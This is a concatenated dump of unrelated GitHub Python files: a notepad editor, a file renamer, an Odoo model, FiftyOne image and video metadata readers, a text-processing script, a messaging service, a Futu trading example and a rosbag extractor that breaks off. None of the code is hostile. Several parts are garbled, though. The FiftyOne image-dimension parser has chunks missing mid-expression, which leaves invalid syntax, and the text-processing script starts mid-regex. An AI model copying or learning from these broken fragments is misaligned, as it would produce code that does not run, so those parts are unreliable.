info:\nCharacter count: {charCount}.\nwords count: {wrdCount}.\nlines count: {lnsCount}\nMost frequent word: {frequent} Which was repeated {repeted} times.\n{urlsc}\n{emailsc}\n \"\"\").format(charCount=characters, wrdCount=words, lnsCount=lines, frequent=frequentWord, repeted=wordRepeted, urlsc=urlCount, emailsc=emailsCount)\n\t\treturn info.strip()\n\n\tdef OnShortcuts(self, event):\n\t\tkey = event.GetKeyCode()\n\t\tif key == wx.WXK_F5:\n\t\t\tself.WriteTime()\n\t\telif key == wx.WXK_UP or key == wx.WXK_DOWN:\n\t\t\tself.SavePosition()\n\t\telif event.altDown and event.GetKeyCode()==ord(\"I\"):\n\t\t\ttext_viewer.viewer(self, _(\"text info\"), _(\"text info\"), self.GetInfo())\n\t\tif int(get(\"autosave\"))==2:\n\t\t\tif event.GetKeyCode()==wx.WXK_SPACE:\n\t\t\t\tself.OnWrite(None)\n\t\tevent.Skip()\n\n\tdef SavePosition(self):\n\t\ttry:\n\t\t\ttry:\n\t\t\t\tg.tabs[g.activeFile][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\t\texcept KeyError:\n\t\t\t\tg.tabs[g.paths[g.tabIndex]][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\t\tbackup.backup().UpdateAll(g.tabs)\n\t\texcept: pass\n\n\n\tdef WriteTime(self, event=None):\n\t\tdate = datetime.now().strftime(\"%I:%m %p %d/%m/%Y\")\n\t\tself.WriteText(date)\n\t\tspeak(_(\"The time has been written successfully\"))\n\n\n\tdef OnWrite(self, event):\n\t\tif not self.loaded: return # check if the file has been loaded\n\t\ttry:\n\t\t\tg.tabs[g.activeFile][\"value\"] = self.Value\n\t\t\tg.tabs[g.activeFile][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\texcept KeyError:\n\t\t\tg.tabs[g.paths[g.tabIndex]][\"value\"] = self.Value\n\t\t\tg.tabs[g.paths[g.tabIndex]][\"line\"] = self.PositionToXY(self.InsertionPoint)[-1]\n\t\texcept: pass\n\t\tbackup.backup().UpdateAll(g.tabs)\n\n\tdef NewTab(self):\n\t\tself.clear()\n\t\tnumber = 1\n\t\tnumbers = []\n\t\tfor tab in g.tabs:\n\t\t\tif g.tabs[tab][\"newTab\"]:\n\t\t\t\ttry:\n\t\t\t\t\tnumbers.append(int(g.tabs[tab][\"path\"].split(\" (\")[1].split(\")\")[0]))\n\t\t\t\texcept: pass\n\t\tnumbers.sort()\n\t\tfor n in numbers:\n\t\t\tif number==n:\n\t\t\t\tnumber=n+1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\tfileName = _(\"new file ({num})\").format(num=number)\n\t\tbackup.backup().new(fileName, self.Value, True)\n\t\tg.UpdateTabs()\n\t\tg.tabIndex = g.paths.index(fileName)\n\t\tg.ChangeTitle(fileName)\n\t\tspeak(fileName)\n\t\tg.newTab = True\n\t\tself.loaded = True\n\n\tdef clear(self):\n\t\tself.loaded = False\n\t\tself.Value = \"\"\n\t\tself.__oldContent = \"\"\n\t\tg.activeFile = None\n\t\tg.newTab = False\n\t\tg.tabIndex = 0\n\t\tg.ChangeTitle(\"\")\n\n\tdef load_file(self, path):\n\t\tself.clear()\n\t\tpath = path.replace(\"\\\\\", \"/\")\n\t\tself.Value = \"\"\n\t\tself.__oldContent = \"\"\n\t\tg.last = path\n\t\twith shelve.open(os.path.join(datapath, \"backup\")) as f:\n\t\t\tf[\"last\"] = g.last\n\t\tif path in g.tabs:\n\t\t\tif not os.path.isfile(path) and not g.tabs[path][\"newTab\"]:\n\t\t\t\tmsg = wx.MessageBox(_(\"The file {f} doesn't exist anymore. do you want Keep this file in editor?\").format(f=path), _(\"Keep non existing file\"), style=wx.YES_NO, parent=self.Parent)\n\t\t\t\tif msg == wx.NO:\n\t\t\t\t\tbackup.backup().delete(path)\n\t\t\t\t\tself.Parent.Parent.NextTab()\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tg.tabs[path][\"newTab\"] = True\n\t\t\t\t\tbackup.backup().UpdateAll(g.tabs)\n\t\t\t\t\tg.UpdateTabs()\n\t\t\tself.Value = g.tabs[path][\"value\"]\n\t\t\tself.__oldContent = g.tabs[path][\"value\"]\n\t\t\ttry:\n\t\t\t\tself.InsertionPoint = self.XYToPosition(1, g.tabs[path][\"line\"])\n\t\t\texcept: pass\n\t\t\tif g.tabs[path][\"newTab\"]:\n\t\t\t\tg.activeFile = None\n\t\t\t\ttry:\n\t\t\t\t\tfn = os.path.basename(g.tabs[path][\"path\"])\n\t\t\t\texcept:\n\t\t\t\t\tfn = g.tabs[path][\"path\"]\n\t\t\t\tg.ChangeTitle(fn)\n\t\t\t\tg.newTab = True\n\t\t\t\tself.loaded = True\n\t\t\t\tg.UpdateTabs()\n\t\t\t\tg.tabIndex = g.paths.index(path)\n\t\t\t\treturn\n\t\telse:\n\t\t\ttry:\n\t\t\t\twith open(path, \"r\", encoding=\"utf-8\") as f:\n\t\t\t\t\tself.Value = f.read()\n\t\t\t\t\tself.__oldContent = f.read()\n\t\t\texcept:\n\t\t\t\twith open(path, \"r\", encoding=\"ansi\") as f:\n\t\t\t\t\tself.Value = f.read()\n\t\t\t\t\tself.__oldContent = f.read()\n\n\t\tbackup.backup().new(path, self.Value, line=self.PositionToXY(self.InsertionPoint)[-1])\n\t\tg.activeFile = path\n\t\tg.ChangeTitle()\n\t\tg.newTab = False\n\t\tg.UpdateTabs()\n\t\tg.tabIndex = g.paths.index(path)\n\t\tself.loaded = True\n\n","repo_name":"abdallah-hader/advanced_notepad","sub_path":"scripts/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"40490306742","text":"import os\nimport shutil\nimport xml.etree.ElementTree as ET\n\norigin_dir_path = r'D:\\workspace\\dev\\floor'\nenglish_dir_path = r'D:\\workspace\\dev\\floor/eng'\n\n\ndef create_folder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print('Error: Creating directory. ' + directory)\n\n\ndef filename_to_english(file_name):\n print(file_name)\n name = file_name.split('\\\\')[-1]\n category = name.split('_')[0]\n\n if category == '카펫':\n eng_file_name = name.replace(category, 'carpet')\n elif category == '장판':\n eng_file_name = name.replace(category, 'linoleum')\n elif category == '대리석':\n eng_file_name = name.replace(category, 'marble')\n elif category == '소음매트':\n eng_file_name = name.replace(category, 'pad')\n elif category == '마루':\n eng_file_name = name.replace(category, 'wood')\n\n jpg_name = eng_file_name\n\n shutil.copyfile(file_name, os.path.join(english_dir_path, jpg_name))\n\n\ndef main():\n os_files = os.listdir(origin_dir_path)\n floor_types = ['carpet', 'linoleum', 'marble', 'pad', 'wood']\n file_names = []\n # print(os_files)\n create_folder(english_dir_path)\n\n for type in floor_types:\n dir = os.path.join(origin_dir_path, type)\n # print(dir)\n for file in os.listdir(dir):\n filename_to_english(os.path.join(dir, file))\n # print(os.path.join(dir, file.split('.')[0]))\n\n # print(file_names)\n\n # filename_to_english(file_names)\n\n print('done.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vomin0107/dataset-handling","sub_path":"floor_kor2eng.py","file_name":"floor_kor2eng.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39910692560","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\nclass DecLicenseDoc(models.Model):\n \"\"\" 随附单证 \"\"\"\n _name = 'cus_center.dec_lic_doc'\n _rec_name = 'dec_license_no'\n _description = 'DecLicenseDoc'\n\n dec_license_no = fields.Char(string=\"License No\") # 单证编号\n # 多对一关联 报关单\n customs_dec_id = fields.Many2one(comodel_name=\"cus_center.customs_dec\", string=\"customs declaration\")\n dec_license_doc_type_id = fields.Many2one(comodel_name=\"cus_args.dec_license_doc_type\", string=\"DecLicenseDoc type\") # 单证类型/单证代码\n\n","repo_name":"tintumonmartin/odoo-1","sub_path":"custom_addons/cus_center/models/customs_dec_lic_doc.py","file_name":"customs_dec_lic_doc.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40110400852","text":"import logging\nimport shutil\nimport struct\n\nimport asyncio\nimport aiofiles\n\nimport eta.core.serial as etas\nimport eta.core.utils as etau\nimport eta.core.video as etav\n\nimport fiftyone.core.media as fom\n\n\nlogger = logging.getLogger(__name__)\n\n_FFPROBE_BINARY_PATH = shutil.which(\"ffprobe\")\n\n\nasync def get_metadata(filepath, media_type, metadata=None):\n \"\"\"Gets the metadata for the given media file.\n\n Args:\n filepath: the path to the file\n media_type: the media type of the collection\n metadata (None): a pre-existing metadata dict to use if possible\n\n Returns:\n metadata dict\n \"\"\"\n is_video = media_type == fom.VIDEO\n\n if metadata:\n if is_video:\n width = metadata.get(\"frame_width\", None)\n height = metadata.get(\"frame_height\", None)\n frame_rate = metadata.get(\"frame_rate\", None)\n\n if width and height and frame_rate:\n return {\n \"width\": width,\n \"height\": height,\n \"frame_rate\": frame_rate,\n }\n else:\n width = metadata.get(\"width\", None)\n height = metadata.get(\"height\", None)\n\n if width and height:\n return {\"width\": width, \"height\": height}\n\n try:\n return await read_metadata(filepath, is_video)\n except:\n pass\n\n if is_video:\n return {\"width\": 512, \"height\": 512, \"frame_rate\": 30}\n\n return {\"width\": 512, \"height\": 512}\n\n\nasync def read_metadata(filepath, is_video):\n \"\"\"Calculates the metadata for the given media path.\n\n Args:\n filepath: a filepath\n is_video: whether the file is a video\n\n Returns:\n dict\n \"\"\"\n if is_video:\n info = await get_stream_info(filepath)\n return {\n \"width\": info.frame_size[0],\n \"height\": info.frame_size[1],\n \"frame_rate\": info.frame_rate,\n }\n\n async with aiofiles.open(filepath, \"rb\") as f:\n width, height = await get_image_dimensions(f)\n return {\"width\": width, \"height\": height}\n\n\nasync def get_stream_info(path):\n \"\"\"Returns a :class:`eta.core.video.VideoStreamInfo` instance for the\n provided video path.\n\n Args:\n path: a video filepath\n\n Returns:\n a :class:`eta.core.video.VideoStreamInfo`\n \"\"\"\n if _FFPROBE_BINARY_PATH is None:\n raise RuntimeError(\n \"You must have ffmpeg installed on your machine in order to view \"\n \"video datasets in the App, but we failed to find it\"\n )\n\n proc = await asyncio.create_subprocess_exec(\n _FFPROBE_BINARY_PATH,\n \"-loglevel\",\n \"error\",\n \"-show_format\",\n \"-show_streams\",\n \"-print_format\",\n \"json\",\n \"-i\",\n path,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n\n stdout, stderr = await proc.communicate()\n if stderr:\n raise ValueError(stderr)\n\n info = etas.load_json(stdout.decode(\"utf8\"))\n\n video_streams = [s for s in info[\"streams\"] if s[\"codec_type\"] == \"video\"]\n num_video_streams = len(video_streams)\n if num_video_streams == 1:\n stream_info = video_streams[0]\n elif num_video_streams == 0:\n logger.debug(\"No video stream found; defaulting to first stream\")\n stream_info = info[\"streams\"][0]\n else:\n logger.debug(\"Found multiple video streams; using first stream\")\n stream_info = video_streams[0]\n\n format_info = info[\"format\"]\n mime_type = etau.guess_mime_type(path)\n\n return etav.VideoStreamInfo(stream_info, format_info, mime_type=mime_type)\n\n\nasync def get_image_dimensions(input):\n \"\"\"Gets the dimensions of an image from its asynchronous byte stream.\n\n Args:\n input: file-like object with async read and seek methods\n\n Returns:\n the ``(width, height)``\n \"\"\"\n height = -1\n width = -1\n data = await input.read(26)\n size = len(data)\n\n if (size >= 10) and data[:6] in (b\"GIF87a\", b\"GIF89a\"):\n # GIFs\n w, h = struct.unpack(\"= 24)\n and data.startswith(b\"\\211PNG\\r\\n\\032\\n\")\n and (data[12:16] == b\"IHDR\")\n ):\n # PNGs\n w, h = struct.unpack(\">LL\", data[16:24])\n width = int(w)\n height = int(h)\n elif (size >= 16) and data.startswith(b\"\\211PNG\\r\\n\\032\\n\"):\n # older PNGs\n w, h = struct.unpack(\">LL\", data[8:16])\n width = int(w)\n height = int(h)\n elif (size >= 2) and data.startswith(b\"\\377\\330\"):\n await input.seek(2)\n b = await input.read(1)\n while b and ord(b) != 0xDA:\n while ord(b) != 0xFF:\n b = await input.read(1)\n while ord(b) == 0xFF:\n b = await input.read(1)\n if ord(b) >= 0xC0 and ord(b) <= 0xC3:\n await input.read(3)\n tmp = await input.read(4)\n h, w = struct.unpack(\">HH\", tmp)\n break\n else:\n tmp = await input.read(2)\n await input.read(int(struct.unpack(\">H\", tmp)[0]) - 2)\n b = await input.read(1)\n width = int(w)\n height = int(h)\n elif (size >= 26) and data.startswith(b\"BM\"):\n # BMP\n headersize = struct.unpack(\"= 40:\n w, h = struct.unpack(\"= 8) and data[:4] in (b\"II\\052\\000\", b\"MM\\000\\052\"):\n # Standard TIFF, big- or little-endian\n # BigTIFF and other different but TIFF-like formats are not\n # supported currently\n byteOrder = data[:2]\n boChar = \">\" if byteOrder == \"MM\" else \"<\"\n # maps TIFF type id to size (in bytes)\n # and python format char for struct\n tiffTypes = {\n 1: (1, boChar + \"B\"), # BYTE\n 2: (1, boChar + \"c\"), # ASCII\n 3: (2, boChar + \"H\"), # SHORT\n 4: (4, boChar + \"L\"), # LONG\n 5: (8, boChar + \"LL\"), # RATIONAL\n 6: (1, boChar + \"b\"), # SBYTE\n 7: (1, boChar + \"c\"), # UNDEFINED\n 8: (2, boChar + \"h\"), # SSHORT\n 9: (4, boChar + \"l\"), # SLONG\n 10: (8, boChar + \"ll\"), # SRATIONAL\n 11: (4, boChar + \"f\"), # FLOAT\n 12: (8, boChar + \"d\"), # DOUBLE\n }\n ifdOffset = struct.unpack(boChar + \"L\", data[4:8])[0]\n\n countSize = 2\n await input.seek(ifdOffset)\n ec = await input.read(countSize)\n ifdEntryCount = struct.unpack(boChar + \"H\", ec)[0]\n # 2 bytes: TagId + 2 bytes: type + 4 bytes: count of values + 4\n # bytes: value offset\n ifdEntrySize = 12\n for i in range(ifdEntryCount):\n entryOffset = ifdOffset + countSize + i * ifdEntrySize\n await input.seek(entryOffset)\n tag = await input.read(2)\n tag = struct.unpack(boChar + \"H\", tag)[0]\n if tag == 256 or tag == 257:\n # if type indicates that value fits into 4 bytes, value\n # offset is not an offset but value itself\n type = await input.read(2)\n type = struct.unpack(boChar + \"H\", type)[0]\n if type not in tiffTypes:\n raise MetadataException(\"Unable to read metadata\")\n typeSize = tiffTypes[type][0]\n typeChar = tiffTypes[type][1]\n await input.seek(entryOffset + 8)\n value = await input.read(typeSize)\n value = int(struct.unpack(typeChar, value)[0])\n if tag == 256:\n width = value\n else:\n height = value\n if width > -1 and height > -1:\n break\n\n elif size >= 2:\n await input.seek(0)\n reserved = await input.read(2)\n if 0 != struct.unpack(\"|( )', re.A)\n\nfor i in range(300):\n ran = random.randrange(1, count_xhj)\n line = linecache.getline(r'D:\\数据集\\原数据集\\it运维意图识别\\小黄鸡_原本.txt', ran)\n line = re.sub(pattern1, \"\", line.replace('\\n', '').replace('\\t', '').replace(\" \", \"\"))\n strshuzu = jieba.cut(line)\n file3.write(\" \".join(strshuzu)+',\\n')\n\n","repo_name":"lxxj422092598/dialogue_system_context_recognition","sub_path":"single_dialogue_context_recognition/pretreatment/entity_ner_train_produce.py","file_name":"entity_ner_train_produce.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21777994312","text":"from .message_context import MessageContext, MessageContextType\nfrom .message_handlers import MessageHandlers\nfrom .. import MessageBusProtocol\nfrom ..composers import MessageBuilder\nfrom ..meta import MessageMetaInformation\nfrom ...logging import LoggerProtocol\nfrom ....utils import UnitID\nfrom ....utils.config import Configuration\n\n\nclass MessageService:\n \"\"\"\n Base class for all message services.\n\n A *message service* wraps message handlers and proper message context creation (i.e., using a flexible context type). It\n is used by the message bus as an encapsulated layer for message dispatching.\n \"\"\"\n\n def __init__(\n self,\n comp_id: UnitID,\n *,\n message_bus: MessageBusProtocol,\n context_type: type[MessageContextType] = MessageContext,\n ):\n \"\"\"\n Args:\n comp_id: The global component identifier.\n message_bus: The global message bus.\n context_type: The type to use when creating a message context.\n \"\"\"\n self._component_id = comp_id\n\n self._message_bus = message_bus\n self._message_handlers = MessageHandlers()\n self._context_type = context_type\n\n def create_context(\n self,\n msg_meta: MessageMetaInformation,\n *,\n logger: LoggerProtocol,\n config: Configuration,\n ) -> MessageContext:\n \"\"\"\n Creates a new service context.\n\n Args:\n msg_meta: The meta information of the message.\n logger: The logger to be used within the new context.\n config: The global component configuration.\n\n Returns:\n The newly created message context.\n \"\"\"\n return self._context_type(\n msg_meta,\n self.create_message_builder(),\n logger=logger,\n config=config,\n )\n\n def create_message_builder(self) -> MessageBuilder:\n \"\"\"\n Creates a new message builder.\n\n Returns:\n The newly created message builder.\n \"\"\"\n return MessageBuilder(self._component_id, self._message_bus)\n\n @property\n def message_handlers(self) -> MessageHandlers:\n \"\"\"\n The message handlers maintained by this message service.\n \"\"\"\n return self._message_handlers\n","repo_name":"Sciebo-RDS/rds-ng","sub_path":"src/common/py/core/messaging/handlers/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"41239689751","text":"\n'''\n# y = b0 (for profit) + b1.x1 (for r&d) + b2.x2 (for admin) + b3.x3 (marketing) + b4.D1 (state is categorical)\n# D1: to achieve correct regression, you need to convert the state column to categories of 0/1 for each value in it.\n# you should use only 1 dummy variable (for example you choose newyork only and use 0/1)\n# always omit one dummy variable (if you 3 use 2, if you have 100 use 99)\n'''\n\n'''\n#backward elimination\nstep1: set a significance level to stay in the model; say SL=0.05\nstep2: fit the model with all possible predictors\nstep3: consider the predictor with the highest p-value, if p>SL, go to step4, otherwise end\nstep4: remove the predictor\nstep5: go to step2\nend\n'''\n\n'''\n#forward selection\nstep1: select significance level\nstep2: fit all simple regression models, select the one with the lowest p-value\nstep3: keep this variable and fit all possible models with one extra predictor added t the one(s) you already have\nstep4: consider the predictor with the lowest p-value, if p 0:\n holding_position = data['qty'][0]\n print('Position {} {}'.format(code, holding_position))\n return holding_position\n\ndef get_ask_and_bid(code):\n ret, data = quote_context.get_order_book(code, num=1)\n if ret != RET_OK:\n print('No L1 for ', code, data)\n return None, None\n return data['Ask'][0][0], data['Bid'][0][0]\n\ndef is_valid_quantity(code, quantity, price):\n ret, data = trade_context.acctradinginfo_query(\n order_type=OrderType.NORMAL, code=code, price=price,\n trd_env=TRADING_ENVIRONMENT)\n if ret != RET_OK:\n print('Failed in getting valid qty', code, data)\n return False\n max_can_buy = data['max_cash_buy'][0]\n max_can_sell = data['max_sell_short'][0]\n if quantity > 0:\n return quantity < max_can_buy\n elif quantity < 0:\n return abs(quantity) < max_can_sell\n return false\n\ndef show_order_status(data):\n order_status = data['order_status'][0]\n order_info = dict()\n order_info['code'] = data['code'][0]\n order_info['price'] = data['price'][0]\n order_info['side'] = data['trd_side'][0]\n order_info['qty'] = data['qty'][0]\n print('status', order_status, order_info)\n\ndef test_buy_trade(code):\n ask, bid = get_ask_and_bid(code)\n open_quantity = 100\n if is_valid_quantity(code, open_quantity, ask) == False:\n print('Order quantity beyond valid amount.')\n return None\n ret, data = trade_context.place_order(\n price=ask, qty=open_quantity, code=code, trd_side=TrdSide.BUY,\n order_type=OrderType.NORMAL, trd_env=TRADING_ENVIRONMENT,\n remark='moving_average_strategy')\n if ret != RET_OK:\n print('Failed in placing order', data)\n\n############################ Callbacks ############################\ndef on_init():\n if not unlock_trade():\n return False\n print('************ ON_INIT ***********')\n return True\n\nEXAMPLE_CODE = 'HK.09618'\nif __name__ == '__main__':\n if not on_init():\n print('Failed in on_init()')\n quote_context.close()\n trade_context.close()\n print('Do something here')\n list_accounts()\n trading_rules(EXAMPLE_CODE)\n account_info()\n recent_orders()\n is_normal_trading_time(EXAMPLE_CODE)\n list_position()\n","repo_name":"ziwei-yang/futu_mclient","sub_path":"trader/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27885927138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# python extract_image.py \n# --bag * \n# --image_topics * \n# --imu_topics * \n# --gnss_topics * \n# --uwb_topics * \n# --gt_topics * \n# --output_folder ?(~/Desktop/)\n\nimport os\nimport argparse\nimport cv2\nimport sys\nimport rosbag\n\nfrom cv_bridge import CvBridge\n\ndef bag2image(bag=str, image_topic=str, output_folder=str):\n # support an image topic\n\n print(\"Extract images from %s on topic %s into %s\" % (bag, image_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n bridge = CvBridge()\n count = 0\n for topic, msg, t in bag_to_read.read_messages(topics=image_topic):\n\t# for img raw\n cv_img = bridge.imgmsg_to_cv2(msg, desired_encoding=\"passthrough\")\n\t# for img compressed \n\t# cv_img = bridge.compressed_imgmsg_to_cv2(msg, desired_encoding=\"passthrough\")\n\n timestr=\"%d\"%(msg.header.stamp.to_sec()*1e9)\n\t\n\t#img filename: frame+num\n # cv2.imwrite(os.path.join(args.output_dir, \"frame%06i.png\" % count), cv_img)\n\t#img filename: rostime ns\n cv2.imwrite(os.path.join(output_folder,timestr+\".jpg\"), cv_img)\n\n print(\"Wrote image %i\" % count)\n count += 1\n\n bag_to_read.close()\n\n return\n\ndef bag2imu(bag=str, imu_topic=str, output_folder=str):\n # support an imu topic\n\n print(\"Extract imu records from %s on topic %s into %s\" % (bag, imu_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n imu = open(os.path.join(output_folder,\"imu.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=imu_topic):\n\n acc_y = \"%.10f\" % msg.linear_acceleration.y\n acc_x = \"%.10f\" % msg.linear_acceleration.x\n acc_z = \"%.10f\" % msg.linear_acceleration.z\n w_y = \"%.10f\" % msg.angular_velocity.y\n w_x = \"%.10f\" % msg.angular_velocity.x\n w_z = \"%.10f\" % msg.angular_velocity.z\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n imudata = timestr + \" \" + w_x + \" \" + w_y + \" \" + w_z + \" \" + acc_x + \" \" + acc_y + \" \" + acc_z\n imu.write(imudata)\n imu.write('\\n')\n bag_to_read.close()\n\n return\n\ndef bag2gnss(bag=str, gnss_topic=str, output_folder=str):\n # support an gnss topic\n\n print(\"Extract gnss records from %s on topic %s into %s\" % (bag, gnss_topic, output_folder))\n\n bag_to_read = rosbag.Bag(bag, \"r\")\n gnss = open(os.path.join(output_folder,\"gnss.txt\"),\"w\")\n for topic, msg, t in bag_to_read.read_messages(topics=gnss_topic):\n\n pos_x = \"%.10f\" % msg.latitude\n pos_y = \"%.10f\" % msg.longitude\n pos_z = \"%.10f\" % msg.altitude\n v0=\"%.6f\" % msg.position_covariance[0]\n v1=\"%.6f\" % msg.position_covariance[1]\n v2=\"%.6f\" % msg.position_covariance[2]\n v3=\"%.6f\" % msg.position_covariance[3]\n v4=\"%.6f\" % msg.position_covariance[4]\n v5=\"%.6f\" % msg.position_covariance[5]\n v6=\"%.6f\" % msg.position_covariance[6]\n v7=\"%.6f\" % msg.position_covariance[7]\n v8=\"%.6f\" % msg.position_covariance[8]\n\n timestr=\"%.6f\"%(msg.header.stamp.to_sec())\n\n gnssdata = timestr + \" \" + pos_x + \" \" + pos_y + \" \" + pos_z + \" \"+v0+ \" \"+v1+ \" \"+v2+ \" \"+v3+ \" \"+v4+ \" \"+v5+ \" \"+v6+ \" \"+v7+ \" \"+v8\n gnss.write(gnssdata)\n gnss.write('\\n')\n bag_to_read.close()\n\ndef bag2uwb(bag=str, uwb_topic=str, output_folder=str):\n # support an uwb topic\n # from uwb_driver.msg import UwbRange # Install from https://github.com/ntu-aris/uwb_driver\n\n # Header header # ROS header\n # uint16 msgId # Message ID handled by p4xx automatically\n # uint8 requester_id # Identity number of the requesting P4xx\n # uint8 responder_id # Identity number of the responding P4xx\n # int8 requester_idx # Index number of the node in the responding array passed by rosparam\n # int8 responder_idx # Index number of the node in the responding array passed by rosparam\n # uint8 range_status # Status/error codes for the range conversation\n # uint8 antenna # Antenna where the measurement was carried out\n # uint16 stopwatch_time # How long the range conversation took, in ms\n # float32 distance # Distance measurement using ToF\n # float32 coarse_range # Distance measurement using signal strength\n # float32 filtered_range # Distance measurement using filter\n # float32 distance_err # Distance error estimate\n # float32 coarse_range_err # Coarse range error\n # float32 filtered_range_err # Filter range error\n # float32 distance_dot # Range velocity estimated by Pxx\n # float32 distance_dot_err # Range velocity error estimated by Pxx\n # uint8 range_meas_type # Range measurement type\n # uint16 requester_LED_flag # requester's received scan: 16 for NLS\n # uint16 responder_LED_flag # responder's received scan: 16 for NLS\n # uint16 noise # Noise\n # uint16 vPeak # Absolute maximum value in the leading edge window of the received waveform\n # int32 coarse_tof_in_bins # Coarse tof in bins\n # uint32 uwb_time # ms since radio boot at the time of the range conversation nb\n # geometry_msgs/Point requester_location # Location of the requester node if known (explicitly declared as anchor by rosparam), otherwise 99999 indicates unknown.\n # geometry_msgs/Point responder_location # Location of the responder node if known (explicitly declared as anchor by rosparam), otherwise 99999 indicates unknown.\n # geometry_msgs/Point rqst_antenna_offset # Location of the antenna in the body frame of the requester.\n # geometry_msgs/Point rspd_antenna_offset # Location of the antenna in the body frame of the responder.\n\n print(\"Extract uwb records from %s on topic %s into %s\" % (bag, uwb_topic, output_folder))\n bag_to_read = rosbag.Bag(bag,'r')\n uwb = open(os.path.join(output_folder,\"uwb.csv\"),\"w\")\n\n uwb.write(\"timeUWB\" +\",\"+\\\n \"msgId\" +\",\"+\\\n \"requester_id\" +\",\"+\\\n \"responder_id\" +\",\"+\\\n \"requester_idx\" +\",\"+\\\n \"responder_idx\" +\",\"+\\\n \"range_status\" +\",\"+\\\n \"antenna\" +\",\"+\\\n \"stopwatch_time\" +\",\"+\\\n \"distance\" +\",\"+\\\n \"coarse_range\" +\",\"+\\\n \"filtered_range\" +\",\"+\\\n \"distance_err\" +\",\"+\\\n \"coarse_range_err\" +\",\"+\\\n \"filtered_range_err\" +\",\"+\\\n \"distance_dot\" +\",\"+\\\n \"distance_dot_err\" +\",\"+\\\n \"range_meas_type\" +\",\"+\\\n \"requester_LED_flag\" +\",\"+\\\n \"responder_LED_flag\" +\",\"+\\\n \"noise\" +\",\"+\\\n \"vPeak\" +\",\"+\\\n \"coarse_tof_in_bins\" +\",\"+\\\n \"uwb_time\" +\",\"+\\\n \"requester_locationx\" +\",\"+\\\n \"requester_locationy\" +\",\"+\\\n \"requester_locationz\" +\",\"+\\\n \"responder_locationx\" +\",\"+\\\n \"responder_locationy\" +\",\"+\\\n \"responder_locationz\" +\",\"+\\\n \"rqst_antenna_offsetx\"+\",\"+\\\n \"rqst_antenna_offsety\"+\",\"+\\\n \"rqst_antenna_offsetz\"+\",\"+\\\n \"rspd_antenna_offsetx\"+\",\"+\\\n \"rspd_antenna_offsety\"+\",\"+\\\n \"rspd_antenna_offsetz\"\n )\n uwb.write(\"\\n\")\n for topic, msg, t in bag_to_read.read_messages(topics=uwb_topic):\n timeUWB = \"%.6f\" % msg.header.stamp.to_sec()\n msgId = str(msg.msgId ) \n requester_id = str(msg.requester_id ) \n responder_id = str(msg.responder_id ) \n requester_idx = str(msg.requester_idx ) \n responder_idx = str(msg.responder_idx ) \n range_status = str(msg.range_status ) \n antenna = str(msg.antenna ) \n stopwatch_time = str(msg.stopwatch_time) \n distance = \"%.6f\"%msg.distance \n coarse_range = \"%.6f\"%msg.coarse_range \n filtered_range = \"%.6f\"%msg.filtered_range \n distance_err = \"%.6f\"%msg.distance_err \n coarse_range_err = \"%.6f\"%msg.coarse_range_err \n filtered_range_err = \"%.6f\"%msg.filtered_range_err \n distance_dot = \"%.6f\"%msg.distance_dot \n distance_dot_err = \"%.6f\"%msg.distance_dot_err \n range_meas_type = str(msg.range_meas_type ) \n requester_LED_flag = str(msg.requester_LED_flag) \n responder_LED_flag = str(msg.responder_LED_flag) \n noise = str(msg.noise ) \n vPeak = str(msg.vPeak ) \n coarse_tof_in_bins = str(msg.coarse_tof_in_bins) \n uwb_time = str(msg.uwb_time ) \n requester_locationx =\"%.6f\" %msg.requester_location.x \n requester_locationy =\"%.6f\" %msg.requester_location.y \n requester_locationz =\"%.6f\" %msg.requester_location.z \n responder_locationx =\"%.6f\" %msg.responder_location.x \n responder_locationy =\"%.6f\" %msg.responder_location.y \n responder_locationz =\"%.6f\" %msg.responder_location.z \n rqst_antenna_offsetx=\"%.6f\" %msg.rqst_antenna_offset.x\n rqst_antenna_offsety=\"%.6f\" %msg.rqst_antenna_offset.y\n rqst_antenna_offsetz=\"%.6f\" %msg.rqst_antenna_offset.z\n rspd_antenna_offsetx=\"%.6f\" %msg.rspd_antenna_offset.x \n rspd_antenna_offsety=\"%.6f\" %msg.rspd_antenna_offset.y \n rspd_antenna_offsetz=\"%.6f\" %msg.rspd_antenna_offset.z \n\n uwbData = \\\n timeUWB +\",\"+\\\n msgId +\",\"+\\\n requester_id +\",\"+\\\n responder_id +\",\"+\\\n requester_idx +\",\"+\\\n responder_idx +\",\"+\\\n range_status +\",\"+\\\n antenna +\",\"+\\\n stopwatch_time +\",\"+\\\n distance +\",\"+\\\n coarse_range +\",\"+\\\n filtered_range +\",\"+\\\n distance_err +\",\"+\\\n coarse_range_err +\",\"+\\\n filtered_range_err +\",\"+\\\n distance_dot +\",\"+\\\n distance_dot_err +\",\"+\\\n range_meas_type +\",\"+\\\n 